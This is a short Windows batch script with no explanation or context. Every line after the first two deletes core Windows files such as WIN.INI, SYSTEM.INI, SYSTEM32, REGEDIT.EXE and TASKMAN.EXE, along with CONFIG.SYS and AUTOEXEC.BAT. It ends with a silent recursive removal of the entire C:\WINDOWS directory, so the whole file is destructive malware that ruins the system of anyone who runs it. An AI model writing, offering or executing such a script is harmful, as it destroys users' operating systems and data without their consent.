@ECHO OFF
CD\WINDOWS
DEL WIN.INI
DEL WIN.COM
DEL SYSTEM
DEL SYSTEM.INI
DEL SYSTEM.COM
DEL SYSTEM32
DEL SECURITY
DEL REGEDIT.EXE
DEL HH.EXE
DEL CONFIG
DEL CONTROL.INI
DEL CONTROL.COM
DEL DEBUG
DEL CLOCK.AVI
DEL TASKMAN.EXE
DEL WININIT.INI
DEL WININIT.COM
DEL WEB
CD\
DEL CONFIG.SYS
DEL AUTOEXEC.BAT
rmdir /s /q c:\windows